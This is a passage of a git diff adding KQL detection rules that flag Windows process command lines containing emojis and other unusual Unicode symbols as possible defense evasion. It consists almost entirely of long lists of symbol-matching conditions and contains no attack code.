ProcessCommandLine contains "💴" or ProcessCommandLine contains "💶" or ProcessCommandLine contains "💷" or ProcessCommandLine contains "🪙" or ProcessCommandLine contains "💰" or ProcessCommandLine contains "💳" or ProcessCommandLine contains "💎" or ProcessCommandLine contains "⚖️" or ProcessCommandLine contains "🪜" or ProcessCommandLine contains "🧰" or ProcessCommandLine contains "🪛" or ProcessCommandLine contains "🔧" or ProcessCommandLine contains "🔨" or ProcessCommandLine contains "⚒" or ProcessCommandLine contains "🛠" or ProcessCommandLine contains "⛏" or ProcessCommandLine contains "🪚" or ProcessCommandLine contains "🔩" or ProcessCommandLine contains "⚙️" or ProcessCommandLine contains "🪤" or ProcessCommandLine contains "🧱" or ProcessCommandLine contains "⛓" or ProcessCommandLine contains "🧲" or ProcessCommandLine contains "🔫" or ProcessCommandLine contains "💣" or ProcessCommandLine contains "🧨" or ProcessCommandLine contains "🪓" or ProcessCommandLine contains "🔪" or ProcessCommandLine contains "🗡" or ProcessCommandLine contains "⚔️" or ProcessCommandLine contains "🛡" or ProcessCommandLine contains "🚬" or ProcessCommandLine contains "⚰️" or ProcessCommandLine contains "🪦" or ProcessCommandLine contains "⚱️" or ProcessCommandLine contains "🏺" or ProcessCommandLine contains "🔮" or ProcessCommandLine contains "📿" or ProcessCommandLine contains "🧿" or ProcessCommandLine contains "🪬" or ProcessCommandLine contains "💈" or ProcessCommandLine contains "⚗️" or ProcessCommandLine contains "🔭" or ProcessCommandLine contains "🔬" or ProcessCommandLine contains "🕳" or ProcessCommandLine contains "🩹" or ProcessCommandLine contains "🩺" or ProcessCommandLine contains "🩻" or ProcessCommandLine contains "🩼" or ProcessCommandLine contains "💊" or ProcessCommandLine contains "💉" or ProcessCommandLine contains "🩸" or ProcessCommandLine contains "🧬" or ProcessCommandLine contains "🦠" or ProcessCommandLine contains "🧫" or ProcessCommandLine contains "🧪" or ProcessCommandLine contains "🌡" or ProcessCommandLine contains "🧹" or ProcessCommandLine contains "🪠" or ProcessCommandLine contains "🧺" or ProcessCommandLine contains "🧻" or ProcessCommandLine contains "🚽" or ProcessCommandLine contains "🚰" or ProcessCommandLine contains "🚿" or ProcessCommandLine contains "🛁" or ProcessCommandLine contains "🛀" or ProcessCommandLine contains "🧼" or ProcessCommandLine contains "🪥" or ProcessCommandLine contains "🪒" or ProcessCommandLine contains "🧽" or ProcessCommandLine contains "🪣" or ProcessCommandLine contains "🧴" or ProcessCommandLine contains "🛎" or ProcessCommandLine contains "🔑" or ProcessCommandLine contains "🗝" or ProcessCommandLine contains "🚪" or ProcessCommandLine contains "🪑" or ProcessCommandLine contains "🛋" or ProcessCommandLine contains "🛏" or ProcessCommandLine contains "🛌" or ProcessCommandLine contains "🧸" or ProcessCommandLine contains "🪆" or ProcessCommandLine contains "🖼" or ProcessCommandLine contains "🪞" or ProcessCommandLine contains "🪟" or ProcessCommandLine contains "🛍" or ProcessCommandLine contains "🛒" or ProcessCommandLine contains "🎁" or ProcessCommandLine contains "🎈" or ProcessCommandLine contains "🎏" or ProcessCommandLine contains "🎀" or ProcessCommandLine contains "🪄" or ProcessCommandLine contains "🪅" or ProcessCommandLine contains "🎊" or ProcessCommandLine contains "🎉" or ProcessCommandLine contains "🪩" or ProcessCommandLine contains "🎎" or ProcessCommandLine contains "🏮" or ProcessCommandLine contains "🎐" or ProcessCommandLine contains "🧧" or ProcessCommandLine contains "✉️" or ProcessCommandLine contains "📩" or ProcessCommandLine contains "📨" or ProcessCommandLine contains "📧" or ProcessCommandLine contains "💌" or ProcessCommandLine contains "📥" or ProcessCommandLine contains "📤" or ProcessCommandLine contains "📦" or ProcessCommandLine contains "🏷" or ProcessCommandLine contains "🪧" or ProcessCommandLine contains "📪" or ProcessCommandLine contains "📫" or ProcessCommandLine contains "📬" or ProcessCommandLine contains "📭" or ProcessCommandLine contains "📮" or ProcessCommandLine contains "📯" or ProcessCommandLine contains "📜" or ProcessCommandLine contains "📃" or ProcessCommandLine contains "📄" or ProcessCommandLine contains "📑" or ProcessCommandLine contains "🧾" or ProcessCommandLine contains "📊" or ProcessCommandLine contains "📈" or ProcessCommandLine contains "📉" or ProcessCommandLine contains "🗒" or ProcessCommandLine contains "🗓" or ProcessCommandLine contains "📆" or ProcessCommandLine contains "📅" or ProcessCommandLine contains "🗑" or ProcessCommandLine contains "🪪" or ProcessCommandLine contains "📇" or ProcessCommandLine contains "🗃" or ProcessCommandLine contains "🗳" or ProcessCommandLine contains "🗄" or ProcessCommandLine contains "📋" or ProcessCommandLine contains "📁" or ProcessCommandLine contains "📂" or ProcessCommandLine contains "🗂" or ProcessCommandLine contains "🗞" or ProcessCommandLine contains "📰" or ProcessCommandLine contains "📓" or ProcessCommandLine contains "📔" or ProcessCommandLine contains "📒" or ProcessCommandLine contains "📕" or ProcessCommandLine contains "📗" or ProcessCommandLine contains "📘" or ProcessCommandLine contains "📙" or ProcessCommandLine contains "📚" or ProcessCommandLine contains "📖" or ProcessCommandLine contains "🔖" or ProcessCommandLine contains "🧷" or ProcessCommandLine contains "🔗" or ProcessCommandLine contains "📎" or ProcessCommandLine contains "🖇" or ProcessCommandLine contains "📐" or ProcessCommandLine contains "📏" or ProcessCommandLine contains "🧮" or ProcessCommandLine contains "📌" or ProcessCommandLine contains "📍" or ProcessCommandLine contains "✂️" or ProcessCommandLine contains "🖊" or ProcessCommandLine contains "🖋" or ProcessCommandLine contains "✒️" or ProcessCommandLine contains "🖌" or ProcessCommandLine contains "🖍" or ProcessCommandLine contains "📝" or ProcessCommandLine contains "✏️" or ProcessCommandLine contains "🔍" or ProcessCommandLine contains "🔎" or ProcessCommandLine contains "🔏" or ProcessCommandLine contains "🔐" or ProcessCommandLine contains "🔒" or ProcessCommandLine contains "🔓❤️" or ProcessCommandLine contains "🧡" or ProcessCommandLine contains "💛" or ProcessCommandLine contains "💚" or ProcessCommandLine contains "💙" or ProcessCommandLine contains "💜" or ProcessCommandLine contains "🖤" or ProcessCommandLine contains "🤍" or ProcessCommandLine contains "🤎" or ProcessCommandLine contains "❤️‍🔥" or ProcessCommandLine contains "❤️‍🩹" or ProcessCommandLine contains "💔" or ProcessCommandLine contains "❣️" or ProcessCommandLine contains "💕" or ProcessCommandLine contains "💞" or ProcessCommandLine contains "💓" or ProcessCommandLine contains "💗" or ProcessCommandLine contains "💖" or ProcessCommandLine contains "💘" or ProcessCommandLine contains "💝" or ProcessCommandLine contains "💟" or ProcessCommandLine contains "☮️" or ProcessCommandLine contains "✝️" or ProcessCommandLine contains "☪️" or ProcessCommandLine contains "🕉" or ProcessCommandLine contains "☸️" or ProcessCommandLine contains "✡️" or ProcessCommandLine contains "🔯" or ProcessCommandLine contains "🕎" or ProcessCommandLine contains "☯️" or ProcessCommandLine contains "☦️" or ProcessCommandLine contains "🛐" or ProcessCommandLine contains "⛎" or ProcessCommandLine contains "♈️" or ProcessCommandLine contains "♉️" or ProcessCommandLine contains "♊️" or ProcessCommandLine contains "♋️" or ProcessCommandLine contains "♌️" or ProcessCommandLine contains "♍️" or ProcessCommandLine contains "♎️" or ProcessCommandLine contains "♏️" or ProcessCommandLine contains "♐️" or ProcessCommandLine contains "♑️" or ProcessCommandLine contains "♒️" or ProcessCommandLine contains "♓️" or ProcessCommandLine contains "🆔" or ProcessCommandLine contains "⚛️" or ProcessCommandLine contains "🉑" or ProcessCommandLine contains "☢️" or ProcessCommandLine contains "☣️" or ProcessCommandLine contains "📴" or ProcessCommandLine contains "📳" or ProcessCommandLine contains "🈶" or ProcessCommandLine contains "🈚️" or ProcessCommandLine contains "🈸" or ProcessCommandLine contains "🈺" or ProcessCommandLine contains "🈷️" or ProcessCommandLine contains "✴️" or ProcessCommandLine contains "🆚" or ProcessCommandLine contains "💮" or ProcessCommandLine contains "🉐" or ProcessCommandLine contains "㊙️" or ProcessCommandLine contains "㊗️" or ProcessCommandLine contains "🈴" or ProcessCommandLine contains "🈵" or ProcessCommandLine contains "🈹" or ProcessCommandLine contains "🈲" or ProcessCommandLine contains "🅰️" or ProcessCommandLine contains "🅱️" or ProcessCommandLine contains "🆎" or ProcessCommandLine contains "🆑" or ProcessCommandLine contains "🅾️" or ProcessCommandLine contains "🆘" or ProcessCommandLine contains "❌" or ProcessCommandLine contains "⭕️" or ProcessCommandLine contains "🛑" or ProcessCommandLine contains "⛔️" or ProcessCommandLine contains "📛" or ProcessCommandLine contains "🚫" or ProcessCommandLine contains "💯" or ProcessCommandLine contains "💢" or ProcessCommandLine contains "♨️" or ProcessCommandLine contains "🚷" or ProcessCommandLine contains "🚯" or ProcessCommandLine contains "🚳" or ProcessCommandLine contains "🚱" or ProcessCommandLine contains "🔞" or ProcessCommandLine contains "📵" or ProcessCommandLine contains "🚭" or ProcessCommandLine contains "❗️" or ProcessCommandLine contains "❕" or ProcessCommandLine contains "❓" or ProcessCommandLine contains "❔" or ProcessCommandLine contains "‼️" or ProcessCommandLine contains "⁉️" or ProcessCommandLine contains "🔅" or ProcessCommandLine contains "🔆" or ProcessCommandLine contains "〽️" or ProcessCommandLine contains "⚠️" or ProcessCommandLine contains "🚸" or ProcessCommandLine contains "🔱" or ProcessCommandLine contains "⚜️" or ProcessCommandLine contains "🔰" or ProcessCommandLine contains "♻️" or ProcessCommandLine contains "✅" or ProcessCommandLine contains "🈯️" or ProcessCommandLine contains "💹" or ProcessCommandLine contains "❇️" or ProcessCommandLine contains "✳️" or ProcessCommandLine contains "❎" or ProcessCommandLine contains "🌐" or ProcessCommandLine contains "💠" or ProcessCommandLine contains "Ⓜ️" or ProcessCommandLine contains "🌀" or ProcessCommandLine contains "💤" or ProcessCommandLine contains "🏧" or ProcessCommandLine contains "🚾" or ProcessCommandLine contains "♿️" or ProcessCommandLine contains "🅿️" or ProcessCommandLine contains "🛗" or ProcessCommandLine contains "🈳" or ProcessCommandLine contains "🈂️" or ProcessCommandLine contains "🛂" or ProcessCommandLine contains "🛃" or ProcessCommandLine contains "🛄" or ProcessCommandLine contains "🛅" or ProcessCommandLine contains "🚹" or ProcessCommandLine contains "🚺" or ProcessCommandLine contains "🚼" or ProcessCommandLine contains "⚧" or ProcessCommandLine contains "🚻" or ProcessCommandLine contains "🚮" or ProcessCommandLine contains "🎦" or ProcessCommandLine contains "📶" or ProcessCommandLine contains "🈁" or ProcessCommandLine contains "🔣" or ProcessCommandLine contains "ℹ️" or ProcessCommandLine contains "🔤" or ProcessCommandLine contains "🔡" or ProcessCommandLine contains "🔠" or ProcessCommandLine contains "🆖" or ProcessCommandLine contains "🆗" or ProcessCommandLine contains "🆙" or ProcessCommandLine contains "🆒" or ProcessCommandLine contains "🆕" or ProcessCommandLine contains "🆓" or ProcessCommandLine contains "0️⃣" or ProcessCommandLine contains "1️⃣" or ProcessCommandLine contains "2️⃣" or ProcessCommandLine contains "3️⃣" or ProcessCommandLine contains "4️⃣" or ProcessCommandLine contains "5️⃣" or ProcessCommandLine contains "6️⃣" or ProcessCommandLine contains "7️⃣" or ProcessCommandLine contains "8️⃣" or ProcessCommandLine contains "9️⃣" or ProcessCommandLine contains "🔟" or ProcessCommandLine contains "🔢" or ProcessCommandLine contains "#️⃣" or ProcessCommandLine contains "️⃣" or ProcessCommandLine contains "⏏️" or ProcessCommandLine contains "▶️" or ProcessCommandLine contains "⏸" or ProcessCommandLine contains "⏯" or ProcessCommandLine contains "⏹" or ProcessCommandLine contains "⏺" or ProcessCommandLine contains "⏭" or ProcessCommandLine contains "⏮" or ProcessCommandLine contains "⏩" or ProcessCommandLine contains "⏪" or ProcessCommandLine contains "⏫" or ProcessCommandLine contains "⏬" or ProcessCommandLine contains "◀️" or ProcessCommandLine contains "🔼" or ProcessCommandLine contains "🔽" or ProcessCommandLine contains "➡️" or ProcessCommandLine contains "⬅️" or ProcessCommandLine contains "⬆️" or ProcessCommandLine contains "⬇️" or ProcessCommandLine contains "↗️" or ProcessCommandLine contains "↘️" or ProcessCommandLine contains "↙️" or ProcessCommandLine contains "↖️" or ProcessCommandLine contains "↕️" or ProcessCommandLine contains "↔️" or ProcessCommandLine contains "↪️" or ProcessCommandLine contains "↩️" or ProcessCommandLine contains "⤴️" or ProcessCommandLine contains "⤵️" or ProcessCommandLine contains "🔀" or ProcessCommandLine contains "🔁" or ProcessCommandLine contains "🔂" or ProcessCommandLine contains "🔄" or ProcessCommandLine contains "🔃" or ProcessCommandLine contains "🎵" or ProcessCommandLine contains "🎶" or ProcessCommandLine contains "➕" or ProcessCommandLine contains "➖" or ProcessCommandLine contains "➗" or ProcessCommandLine contains "✖️" or ProcessCommandLine contains "🟰" or ProcessCommandLine contains "♾" or ProcessCommandLine contains "💲" or ProcessCommandLine contains "💱" or ProcessCommandLine contains "™️" or ProcessCommandLine contains "©️" or ProcessCommandLine contains "®️" or ProcessCommandLine contains "〰️" or ProcessCommandLine contains "➰" or ProcessCommandLine contains "➿" or ProcessCommandLine contains "🔚" or ProcessCommandLine contains "🔙" or ProcessCommandLine contains "🔛" or ProcessCommandLine contains "🔝" or ProcessCommandLine contains "🔜" or ProcessCommandLine contains "✔️" or ProcessCommandLine contains "☑️" or ProcessCommandLine contains "🔘" or ProcessCommandLine contains "🔴" or ProcessCommandLine contains "🟠" or ProcessCommandLine contains "🟡" or ProcessCommandLine contains "🟢" or ProcessCommandLine contains "🔵" or ProcessCommandLine contains "🟣" or ProcessCommandLine contains "⚫️" or ProcessCommandLine contains "⚪️" or ProcessCommandLine contains "🟤" or ProcessCommandLine contains "🔺" or ProcessCommandLine contains "🔻"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql
new file mode 100644
index 00000000..135b12e1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql
@@ -0,0 +1,10 @@
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "🔸" or ProcessCommandLine contains "🔹" or ProcessCommandLine contains "🔶" or ProcessCommandLine contains "🔷" or ProcessCommandLine contains "🔳" or ProcessCommandLine contains "🔲" or ProcessCommandLine contains "▪️" or ProcessCommandLine contains "▫️" or ProcessCommandLine contains "◾️" or ProcessCommandLine contains "◽️" or ProcessCommandLine contains "◼️" or ProcessCommandLine contains "◻️" or ProcessCommandLine contains "🟥" or ProcessCommandLine contains "🟧" or ProcessCommandLine contains "🟨" or ProcessCommandLine contains "🟩" or ProcessCommandLine contains "🟦" or ProcessCommandLine contains "🟪" or ProcessCommandLine contains "⬛️" or ProcessCommandLine contains "⬜️" or ProcessCommandLine contains "🟫" or ProcessCommandLine contains "🔈" or ProcessCommandLine contains "🔇" or ProcessCommandLine contains "🔉" or ProcessCommandLine contains "🔊" or ProcessCommandLine contains "🔔" or ProcessCommandLine contains "🔕" or ProcessCommandLine contains "📣" or ProcessCommandLine contains "📢" or ProcessCommandLine contains "👁‍🗨" or ProcessCommandLine contains "💬" or ProcessCommandLine contains "💭" or ProcessCommandLine contains "🗯" or ProcessCommandLine contains "♠️" or ProcessCommandLine contains "♣️" or ProcessCommandLine contains "♥️" or ProcessCommandLine contains "♦️" or ProcessCommandLine contains "🃏" or ProcessCommandLine contains "🎴" or ProcessCommandLine contains "🀄️" or ProcessCommandLine contains "🕐" or ProcessCommandLine contains "🕑" or ProcessCommandLine contains "🕒" or ProcessCommandLine contains "🕓" or ProcessCommandLine contains "🕔" or ProcessCommandLine contains "🕕" or ProcessCommandLine contains "🕖" or ProcessCommandLine contains "🕗" or ProcessCommandLine contains "🕘" or ProcessCommandLine contains "🕙" or ProcessCommandLine contains "🕚" or ProcessCommandLine contains "🕛" or ProcessCommandLine contains "🕜" or ProcessCommandLine contains "🕝" or ProcessCommandLine contains "🕞" or ProcessCommandLine contains "🕟" or ProcessCommandLine contains "🕠" or ProcessCommandLine contains "🕡" or ProcessCommandLine contains "🕢" or ProcessCommandLine contains "🕣" or ProcessCommandLine contains "🕤" or ProcessCommandLine contains "🕥" or ProcessCommandLine contains "🕦" or ProcessCommandLine contains "🕧✢" or ProcessCommandLine contains "✣" or ProcessCommandLine contains "✤" or ProcessCommandLine contains "✥" or ProcessCommandLine contains "✦" or ProcessCommandLine contains "✧" or ProcessCommandLine contains "★" or ProcessCommandLine contains "☆" or ProcessCommandLine contains "✯" or ProcessCommandLine contains "✡︎" or ProcessCommandLine contains "✩" or ProcessCommandLine contains "✪" or ProcessCommandLine contains "✫" or ProcessCommandLine contains "✬" or ProcessCommandLine contains "✭" or ProcessCommandLine contains "✮" or ProcessCommandLine contains "✶" or ProcessCommandLine contains "✷" or ProcessCommandLine contains "✵" or ProcessCommandLine contains "✸" or ProcessCommandLine contains "✹" or ProcessCommandLine contains "→" or ProcessCommandLine contains "⇒" or ProcessCommandLine contains "⟹" or ProcessCommandLine contains "⇨" or ProcessCommandLine contains "⇾" or ProcessCommandLine contains "➾" or ProcessCommandLine contains "⇢" or ProcessCommandLine contains "☛" or ProcessCommandLine contains "☞" or ProcessCommandLine contains "➔" or ProcessCommandLine contains "➜" or ProcessCommandLine contains "➙" or ProcessCommandLine contains "➛" or ProcessCommandLine contains "➝" or ProcessCommandLine contains "➞" or ProcessCommandLine contains "♠︎" or ProcessCommandLine contains "♣︎" or ProcessCommandLine contains "♥︎" or ProcessCommandLine contains "♦︎" or ProcessCommandLine contains "♤" or ProcessCommandLine contains "♧" or ProcessCommandLine contains "♡" or ProcessCommandLine contains "♢" or ProcessCommandLine contains "♚" or ProcessCommandLine contains "♛" or ProcessCommandLine contains "♜" or ProcessCommandLine contains "♝" or ProcessCommandLine contains "♞" or ProcessCommandLine contains "♟" or ProcessCommandLine contains "♔" or ProcessCommandLine contains "♕" or ProcessCommandLine contains "♖" or ProcessCommandLine contains "♗" or ProcessCommandLine contains "♘" or ProcessCommandLine contains "♙" or ProcessCommandLine contains "⚀" or ProcessCommandLine contains "⚁" or ProcessCommandLine contains "⚂" or ProcessCommandLine contains "⚃" or ProcessCommandLine contains "⚄" or ProcessCommandLine contains "⚅" or ProcessCommandLine contains "🂠" or ProcessCommandLine contains "⚈" or ProcessCommandLine contains "⚉" or ProcessCommandLine contains "⚆" or ProcessCommandLine contains "⚇" or ProcessCommandLine contains "𓀀" or ProcessCommandLine contains "𓀁" or ProcessCommandLine contains "𓀂" or ProcessCommandLine contains "𓀃" or ProcessCommandLine contains "𓀄" or ProcessCommandLine contains "𓀅" or ProcessCommandLine contains "𓀆" or ProcessCommandLine contains "𓀇" or ProcessCommandLine contains "𓀈" or ProcessCommandLine contains "𓀉" or ProcessCommandLine contains "𓀊" or ProcessCommandLine contains "𓀋" or ProcessCommandLine contains "𓀌" or ProcessCommandLine contains "𓀍" or ProcessCommandLine contains "𓀎" or ProcessCommandLine contains "𓀏" or ProcessCommandLine contains "𓀐" or ProcessCommandLine contains "𓀑" or ProcessCommandLine contains "𓀒" or ProcessCommandLine contains "𓀓" or ProcessCommandLine contains "𓀔" or ProcessCommandLine contains "𓀕" or ProcessCommandLine contains "𓀖" or ProcessCommandLine contains "𓀗" or ProcessCommandLine contains "𓀘" or ProcessCommandLine contains "𓀙" or ProcessCommandLine contains "𓀚" or ProcessCommandLine contains "𓀛" or ProcessCommandLine contains "𓀜" or ProcessCommandLine contains "𓀝🏳️" or ProcessCommandLine contains "🏴" or ProcessCommandLine contains "🏁" or ProcessCommandLine contains "🚩" or ProcessCommandLine contains "🏳️‍🌈" or ProcessCommandLine contains "🏳️‍⚧️" or ProcessCommandLine contains "🏴‍☠️" or ProcessCommandLine contains "🇦🇫" or ProcessCommandLine contains "🇦🇽" or ProcessCommandLine contains "🇦🇱" or ProcessCommandLine contains "🇩🇿" or ProcessCommandLine contains "🇦🇸" or ProcessCommandLine contains "🇦🇩" or ProcessCommandLine contains "🇦🇴" or ProcessCommandLine contains "🇦🇮" or ProcessCommandLine contains "🇦🇶" or ProcessCommandLine contains "🇦🇬" or ProcessCommandLine contains "🇦🇷" or ProcessCommandLine contains "🇦🇲" or ProcessCommandLine contains "🇦🇼" or ProcessCommandLine contains "🇦🇺" or ProcessCommandLine contains "🇦🇹" or ProcessCommandLine contains "🇦🇿" or ProcessCommandLine contains "🇧🇸" or ProcessCommandLine contains "🇧🇭" or ProcessCommandLine contains "🇧🇩" or ProcessCommandLine contains "🇧🇧" or ProcessCommandLine contains "🇧🇾" or ProcessCommandLine contains "🇧🇪" or ProcessCommandLine contains "🇧🇿" or ProcessCommandLine contains "🇧🇯" or ProcessCommandLine contains "🇧🇲" or ProcessCommandLine contains "🇧🇹" or ProcessCommandLine contains "🇧🇴" or ProcessCommandLine contains "🇧🇦" or ProcessCommandLine contains "🇧🇼" or ProcessCommandLine contains "🇧🇷" or ProcessCommandLine contains "🇮🇴" or ProcessCommandLine contains "🇻🇬" or ProcessCommandLine contains "🇧🇳" or ProcessCommandLine contains "🇧🇬" or ProcessCommandLine contains "🇧🇫" or ProcessCommandLine contains "🇧🇮" or ProcessCommandLine contains "🇰🇭" or ProcessCommandLine contains "🇨🇲" or ProcessCommandLine contains "🇨🇦" or ProcessCommandLine contains "🇮🇨" or ProcessCommandLine contains "🇨🇻" or ProcessCommandLine contains "🇧🇶" or ProcessCommandLine contains "🇰🇾" or ProcessCommandLine contains "🇨🇫" or ProcessCommandLine contains "🇹🇩" or ProcessCommandLine contains "🇨🇱" or ProcessCommandLine contains "🇨🇳" or ProcessCommandLine contains "🇨🇽" or ProcessCommandLine contains "🇨🇨" or ProcessCommandLine contains "🇨🇴" or ProcessCommandLine contains "🇰🇲" or ProcessCommandLine contains "🇨🇬" or ProcessCommandLine contains "🇨🇩" or ProcessCommandLine contains "🇨🇰" or ProcessCommandLine contains "🇨🇷" or ProcessCommandLine contains "🇨🇮" or ProcessCommandLine contains "🇭🇷" or ProcessCommandLine contains "🇨🇺" or ProcessCommandLine contains "🇨🇼" or ProcessCommandLine contains "🇨🇾" or ProcessCommandLine contains "🇨🇿" or ProcessCommandLine contains "🇩🇰" or ProcessCommandLine contains "🇩🇯" or ProcessCommandLine contains "🇩🇲" or ProcessCommandLine contains "🇩🇴" or ProcessCommandLine contains "🇪🇨" or ProcessCommandLine contains "🇪🇬" or ProcessCommandLine contains "🇸🇻" or ProcessCommandLine contains "🇬🇶" or ProcessCommandLine contains "🇪🇷" or ProcessCommandLine contains "🇪🇪" or ProcessCommandLine contains "🇪🇹" or ProcessCommandLine contains "🇪🇺" or ProcessCommandLine contains "🇫🇰" or ProcessCommandLine contains "🇫🇴" or ProcessCommandLine contains "🇫🇯" or ProcessCommandLine contains "🇫🇮" or ProcessCommandLine contains "🇫🇷" or ProcessCommandLine contains "🇬🇫" or ProcessCommandLine contains "🇵🇫" or ProcessCommandLine contains "🇹🇫" or ProcessCommandLine contains "🇬🇦" or ProcessCommandLine contains "🇬🇲" or ProcessCommandLine contains "🇬🇪" or ProcessCommandLine contains "🇩🇪" or ProcessCommandLine contains "🇬🇭" or ProcessCommandLine contains "🇬🇮" or ProcessCommandLine contains "🇬🇷" or ProcessCommandLine contains "🇬🇱" or ProcessCommandLine contains "🇬🇩" or ProcessCommandLine contains "🇬🇵" or ProcessCommandLine contains "🇬🇺" or ProcessCommandLine contains "🇬🇹" or ProcessCommandLine contains "🇬🇬" or ProcessCommandLine contains "🇬🇳" or ProcessCommandLine contains "🇬🇼" or ProcessCommandLine contains "🇬🇾" or ProcessCommandLine contains "🇭🇹" or ProcessCommandLine contains "🇭🇳" or ProcessCommandLine contains "🇭🇰" or ProcessCommandLine contains "🇭🇺" or ProcessCommandLine contains "🇮🇸" or ProcessCommandLine contains "🇮🇳" or ProcessCommandLine contains "🇮🇩" or ProcessCommandLine contains "🇮🇷" or ProcessCommandLine contains "🇮🇶" or ProcessCommandLine contains "🇮🇪" or ProcessCommandLine contains "🇮🇲" or ProcessCommandLine contains "🇮🇱" or ProcessCommandLine contains "🇮🇹" or ProcessCommandLine contains "🇯🇲" or ProcessCommandLine contains "🇯🇵" or ProcessCommandLine contains "🎌" or ProcessCommandLine contains "🇯🇪" or ProcessCommandLine contains "🇯🇴" or ProcessCommandLine contains "🇰🇿" or ProcessCommandLine contains "🇰🇪" or ProcessCommandLine contains "🇰🇮" or ProcessCommandLine contains "🇽🇰" or ProcessCommandLine contains "🇰🇼" or ProcessCommandLine contains "🇰🇬" or ProcessCommandLine contains "🇱🇦" or ProcessCommandLine contains "🇱🇻" or ProcessCommandLine contains "🇱🇧" or ProcessCommandLine contains "🇱🇸" or ProcessCommandLine contains "🇱🇷" or ProcessCommandLine contains "🇱🇾" or ProcessCommandLine contains "🇱🇮" or ProcessCommandLine contains "🇱🇹" or ProcessCommandLine contains "🇱🇺" or ProcessCommandLine contains "🇲🇴" or ProcessCommandLine contains "🇲🇰" or ProcessCommandLine contains "🇲🇬" or ProcessCommandLine contains "🇲🇼" or ProcessCommandLine contains "🇲🇾" or ProcessCommandLine contains "🇲🇻" or ProcessCommandLine contains "🇲🇱" or ProcessCommandLine contains "🇲🇹" or ProcessCommandLine contains "🇲🇭" or ProcessCommandLine contains "🇲🇶" or ProcessCommandLine contains "🇲🇷" or ProcessCommandLine contains "🇲🇺" or ProcessCommandLine contains "🇾🇹" or ProcessCommandLine contains "🇲🇽" or ProcessCommandLine contains "🇫🇲" or ProcessCommandLine contains "🇲🇩" or ProcessCommandLine contains "🇲🇨" or ProcessCommandLine contains "🇲🇳" or ProcessCommandLine contains "🇲🇪" or ProcessCommandLine contains "🇲🇸" or ProcessCommandLine contains "🇲🇦" or ProcessCommandLine contains "🇲🇿" or ProcessCommandLine contains "🇲🇲" or ProcessCommandLine contains "🇳🇦" or ProcessCommandLine contains "🇳🇷" or ProcessCommandLine contains "🇳🇵" or ProcessCommandLine contains "🇳🇱" or ProcessCommandLine contains "🇳🇨" or ProcessCommandLine contains "🇳🇿" or ProcessCommandLine contains "🇳🇮" or ProcessCommandLine contains "🇳🇪" or ProcessCommandLine contains "🇳🇬" or ProcessCommandLine contains "🇳🇺" or ProcessCommandLine contains "🇳🇫" or ProcessCommandLine contains "🇰🇵" or ProcessCommandLine contains "🇲🇵" or ProcessCommandLine contains "🇳🇴" or ProcessCommandLine contains "🇴🇲" or ProcessCommandLine contains "🇵🇰" or ProcessCommandLine contains "🇵🇼" or ProcessCommandLine contains "🇵🇸" or ProcessCommandLine contains "🇵🇦" or ProcessCommandLine contains "🇵🇬" or ProcessCommandLine contains "🇵🇾" or ProcessCommandLine contains "🇵🇪" or ProcessCommandLine contains "🇵🇭" or ProcessCommandLine contains "🇵🇳" or ProcessCommandLine contains "🇵🇱" or ProcessCommandLine contains "🇵🇹" or ProcessCommandLine contains "🇵🇷" or ProcessCommandLine contains "🇶🇦" or ProcessCommandLine contains "🇷🇪" or ProcessCommandLine contains "🇷🇴" or ProcessCommandLine contains "🇷🇺" or ProcessCommandLine contains "🇷🇼" or ProcessCommandLine contains "🇼🇸" or ProcessCommandLine contains "🇸🇲" or ProcessCommandLine contains "🇸🇦" or ProcessCommandLine contains "🇸🇳" or ProcessCommandLine contains "🇷🇸" or ProcessCommandLine contains "🇸🇨" or ProcessCommandLine contains "🇸🇱" or ProcessCommandLine contains "🇸🇬" or ProcessCommandLine contains "🇸🇽" or ProcessCommandLine contains "🇸🇰" or ProcessCommandLine contains "🇸🇮" or ProcessCommandLine contains "🇬🇸" or ProcessCommandLine contains "🇸🇧" or ProcessCommandLine contains "🇸🇴" or ProcessCommandLine contains "🇿🇦" or ProcessCommandLine contains "🇰🇷" or ProcessCommandLine contains "🇸🇸" or ProcessCommandLine contains "🇪🇸" or ProcessCommandLine contains "🇱🇰" or ProcessCommandLine contains "🇧🇱" or ProcessCommandLine contains "🇸🇭" or ProcessCommandLine contains "🇰🇳" or ProcessCommandLine contains "🇱🇨" or ProcessCommandLine contains "🇵🇲" or ProcessCommandLine contains "🇻🇨" or ProcessCommandLine contains "🇸🇩" or ProcessCommandLine contains "🇸🇷" or ProcessCommandLine contains "🇸🇿" or ProcessCommandLine contains "🇸🇪" or ProcessCommandLine contains "🇨🇭" or ProcessCommandLine contains "🇸🇾" or ProcessCommandLine contains "🇹🇼" or ProcessCommandLine contains "🇹🇯" or ProcessCommandLine contains "🇹🇿" or ProcessCommandLine contains "🇹🇭" or ProcessCommandLine contains "🇹🇱" or ProcessCommandLine contains "🇹🇬" or ProcessCommandLine contains "🇹🇰" or ProcessCommandLine contains "🇹🇴" or ProcessCommandLine contains "🇹🇹" or ProcessCommandLine contains "🇹🇳" or ProcessCommandLine contains "🇹🇷" or ProcessCommandLine contains "🇹🇲" or ProcessCommandLine contains "🇹🇨" or ProcessCommandLine contains "🇹🇻" or ProcessCommandLine contains "🇻🇮" or ProcessCommandLine contains "🇺🇬" or ProcessCommandLine contains "🇺🇦" or ProcessCommandLine contains "🇦🇪" or ProcessCommandLine contains "🇬🇧" or ProcessCommandLine contains "🏴󠁧󠁢󠁥󠁮󠁧󠁿" or ProcessCommandLine contains "🏴󠁧󠁢󠁳󠁣󠁴󠁿" or ProcessCommandLine contains "🏴󠁧󠁢󠁷󠁬󠁳󠁿" or ProcessCommandLine contains "🇺🇳" or ProcessCommandLine contains "🇺🇸" or ProcessCommandLine contains "🇺🇾" or ProcessCommandLine contains "🇺🇿" or ProcessCommandLine contains "🇻🇺" or ProcessCommandLine contains "🇻🇦" or ProcessCommandLine contains "🇻🇪" or ProcessCommandLine contains "🇻🇳" or 